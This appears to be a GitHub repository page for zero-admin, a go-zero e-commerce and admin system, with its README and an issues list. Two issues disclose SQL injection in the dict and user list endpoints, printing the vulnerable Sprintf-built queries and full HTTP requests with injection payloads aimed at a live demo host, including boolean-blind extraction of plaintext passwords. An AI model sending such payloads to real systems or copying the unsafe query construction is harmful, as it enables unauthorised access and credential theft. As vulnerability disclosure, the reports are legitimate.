
zero-admin's Introduction

Zero-Admin e-commerce system

Note: the ORM persistence layer has been switched entirely to gorm. The backend interfaces changed considerably and the frontend is being re-adapted.

Base code generation: https://github.com/feihua/generate-code

go run main.go golang zero --dsn "root:123456@tcp(127.0.0.1:3306)/zero-sys" --tableNames sys_ --prefix sys_  --rpcClient sysclient --author liufeihua

Zero-Admin is an e-commerce system built on the go-zero framework and deployed in Docker containers. It consists of a storefront (mall) system and a back-office management system.

Storefront system

Modules

  1. Home portal: the entry point for visitors, showing popular products and recommendations.

  2. Product recommendations: personalised product suggestions based on the user's history and preferences.

  3. Product search: keyword search with filtering.

  4. Product display: product information including detailed description, price and reviews.

  5. Shopping cart: users can add products to a cart for batch purchase.

  6. Order flow: the complete order process, including placing the order, payment, shipping and receipt.

  7. Member centre: users can manage personal information and view order status, points and so on.

  8. Help centre: FAQs, after-sales policy and related information.

Tech stack

  • Built on the go-zero framework: high performance and easy to extend.
  • Frontend built with a modern frontend framework such as React or Vue.
  • Docker container deployment for quick setup.

Back-office management system

Modules

  1. Product management: add, edit and delete products.

  2. Order management: real-time monitoring of order status, with support for shipping, cancelling and other operations.

  3. Member management: manage user information, including registered users and membership levels.

  4. Promotion management: manage marketing campaigns such as spend-and-save and discounts.

  5. Operations management: manage advertisements, promotions and other operational activities.

  6. Content management: manage site content, including announcements and news.

  7. Permission management: manage system user permissions to keep the system secure.

  8. Settings: system configuration, including payment methods and logistics information.

Tech stack

  • go-zero framework provides the back-office APIs.
  • UI developed with a modern frontend framework.
  • Database: xxx.
  • Docker container deployment for easy management and maintenance.

Documentation

https://feihua.github.io/ (work in progress)

zero-admin-ui is the back-office PC management client, an admin console built with React.

flutter_mall is the zero-admin app client, a hands-on Flutter e-commerce project that includes the home page, list page, detail page, cart page, member centre and payment (payment is integrated with Alipay).

zero-pc-web is the zero-admin web client, a web e-commerce storefront built with React (preview: http://110.41.179.89/pc/).

Android version

Android demo: flutter-mall-app

Project template

zero-admin-template (contains only basic RBAC permissions)

1. Project preview

Preview URL: http://110.41.179.89/mall, account: admin, password: 123456

Note: some modify and delete permissions are not enabled for the demo account.

Payment module (independent of zero-admin): see Jeepay and dax-pay.

1.1 Users


1.1.1 Add user


1.2 Roles


1.2.1 Assign permissions


1.3 Menus


1.4 Organisations


1.5 Dictionaries


1.6 Logs


1.7 Job list


2. Acknowledgements

go-zero

mall

zero-admin's People

Contributors

dugudotxin, feihua, guohuixixi, loyalpartner, p18420199451, yh-zero, ywanbing


zero-admin's Issues

[bug] SQL injection

The route corresponding to this code is /api/sys/dict/list

func (m *customSysDictModel) FindAll(ctx context.Context, in *sysclient.DictListReq) (*[]SysDict, error) {
	where := "1=1"
	if len(in.Type) > 0 {
		where = where + fmt.Sprintf(" AND type like '%%%s%%'", in.Type)
	}
	if len(in.Label) > 0 {
		where = where + fmt.Sprintf(" AND label like '%%%s%%'", in.Label)
	}
	if in.DelFlag != 2 {
		where = where + fmt.Sprintf(" AND del_flag = %d", in.DelFlag)
	}
	query := fmt.Sprintf("select %s from %s where %s limit ?,?", sysDictRows, m.table, where)
	var resp []SysDict
	err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize)
	switch err {
	case nil:
		return &resp, nil
	case sqlc.ErrNotFound:
		return nil, ErrNotFound
	default:
		return nil, err
	}
}

POST http://110.41.179.89/api/sys/dict/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 77
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/dict/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":1,"type":"1919810%' OR id = 2 AND '114514' like '%1"}

[bug] SQL injection exposes other accounts' passwords

The route corresponding to this code is /api/sys/user/list

func (m *customSysUserModel) FindAll(ctx context.Context, in *sysclient.UserListReq) (*[]SysUserList, error) {
	where := "1=1"
	if len(in.Name) > 0 {
		where = where + fmt.Sprintf(" AND sys_user.name like '%%%s%%'", in.Name)
	}
	if len(in.Mobile) > 0 {
		where = where + fmt.Sprintf(" AND sys_user.mobile like '%%%s%%'", in.Mobile)
	}
	if in.Status != 2 {
		where = where + fmt.Sprintf(" AND sys_user.status = %d", in.Status)
	}
	where = where + fmt.Sprint(" ORDER BY create_time DESC")
	query := fmt.Sprintf("select sys_user.*, ifnull(sj.job_name,'') as job_name, ifnull(sd.name ,'')as dept_name, ifnull(sys_role.name,'') as role_name,ifnull(sys_role.id ,'0')as role_id from sys_user left join sys_user_role sur on sys_user.id = sur.user_id left join sys_role on sur.role_id = sys_role.id left join sys_job sj on sys_user.job_id = sj.id left join sys_dept sd on sys_user.dept_id = sd.id where %s limit ?,?", where)
	var resp []SysUserList
	err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize)
	switch err {
	case nil:
		return &resp, nil
	case sqlc.ErrNotFound:
		return nil, ErrNotFound
	default:
		return nil, err
	}
}

  • This code queries a table that contains account and password columns, and it has a SQL injection.
  • Passwords are stored in plaintext in the database.

So boolean-based blind injection can be used to match out other accounts' plaintext passwords one by one.

The demo site's admin password is known to be 123456.
A simple injection check:

sys_user.username like '%admin' AND sys_user.password like '124%' : no match

POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 75
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '124"}

sys_user.username like '%admin' AND sys_user.password like '123456%' : match

POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 78
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '123456"}

Cannot log in to the preview site

{userName: "admin", password: "123456", autoLogin: true, type: "account"}

Response:

rpc error: code = Unknown desc = 用户密码不正确

Database log output problem

func (w Writer) Printf(format string, args ...interface{}) {
	logx.Infof(format, args)
}

It should be changed to

func (w Writer) Printf(format string, args ...interface{}) {
	logx.Infof(format, args...)
}

Hello, a question about the project's naming convention

I have seen go-zero's recommended file naming convention: lowercase without underscores.
In this project most directory and file names are several words run together in lowercase with no separator. What is the purpose of this? Without separators it looks a little odd.
Also, I see two directories, front-api and common/errorx, that are named the other way.

What is the front-api directory for?

From the sh script I see the api service is started with docker, but the front-api service is not started. What is the service in this directory used for?

Project introduction

Has anyone roughly run the author's project and could briefly describe the business structure and project structure?

[bug] sms build fails

Running docker build -t sms:v1 -f rpc/sms/Dockerfile . fails with:

#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductcategoryrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:79: in.Current undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:91: in.PageSize undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method PageSize)
#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:71: in.Current undefined (type *smsclient.CouponProductRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:83: in.PageSize undefined (type *smsclient.CouponProductRelationListReq has no field or method PageSize)
------
Dockerfile:13
--------------------
  11 |     RUN sh -c "[ -f go.mod ]" || exit
  12 |     COPY rpc/sms/etc /app/etc
  13 | >>> RUN go build -ldflags="-s -w" -o /app/sms rpc/sms/sms.go
  14 |     
  15 |     
--------------------
ERROR: failed to solve: process "/bin/sh -c go build -ldflags=\"-s -w\" -o /app/sms rpc/sms/sms.go" did not complete successfully: exit code: 1

The cause is commit 4c14598, which removed the Current and PageSize fields from CouponProductCategoryRelationListReq in zero-admin\rpc\sms\smsclient\sms.pb.go, while the following two places still depend on the Current and PageSize fields:

  • the method CouponProductCategoryRelationList in zero-admin\rpc\sms\internal\logic\couponproductcategoryrelationservice\couponproductcategoryrelationlistlogic.go
  • the method CouponProductRelationList in zero-admin\rpc\sms\internal\logic\couponproductrelationservice\couponproductrelationlistlogic.go
